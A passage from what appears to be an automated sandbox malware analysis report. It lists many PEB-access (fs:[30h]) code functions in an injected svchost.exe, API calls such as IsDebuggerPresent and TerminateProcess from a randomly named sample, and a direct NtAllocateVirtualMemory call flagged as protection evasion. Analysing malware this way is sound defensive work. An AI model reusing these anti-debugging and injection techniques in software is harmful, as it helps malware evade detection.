                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h]2_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h]2_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h]2_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h]2_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h]2_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h]2_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h]2_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h]2_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h]2_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h]2_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h]2_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h]2_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h]2_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h]2_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h]2_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h]2_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h]2_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h]2_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h]2_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h]2_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h]2_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h]2_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h]2_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h]2_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]2_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]2_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]2_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]2_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]2_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]2_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]2_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6030 mov eax, dword ptr fs:[00000030h]2_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h]2_2_03CB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD678E mov eax, dword ptr fs:[00000030h]2_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h]2_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE47A0 mov eax, dword ptr fs:[00000030h]2_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h]2_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE75D mov eax, dword ptr fs:[00000030h]2_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h]2_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h]2_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h]2_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h]2_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h]2_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h]2_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]2_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]2_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]2_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]2_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72619 mov eax, dword ptr fs:[00000030h]2_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E627 mov eax, dword ptr fs:[00000030h]2_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C66620 mov eax, dword ptr fs:[00000030h]2_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68620 mov eax, dword ptr fs:[00000030h]2_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3262C mov eax, dword ptr fs:[00000030h]2_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C365D0 mov eax, dword ptr fs:[00000030h]2_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C325E0 mov eax, dword ptr fs:[00000030h]2_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe, Code function: 0_2_004580A9: GetTokenInformation, GetLastError, GetProcessHeap, HeapAlloc, GetTokenInformation
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe, Code function: 0_2_0042A155: SetUnhandledExceptionFilter, UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe, Code function: 0_2_0042A124: SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe, Code function: 0_2_00B01361: IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe, Code function: 0_2_00B04C7B: SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe, NtAllocateVirtualMemory: Direct from: 0x76EF48EC
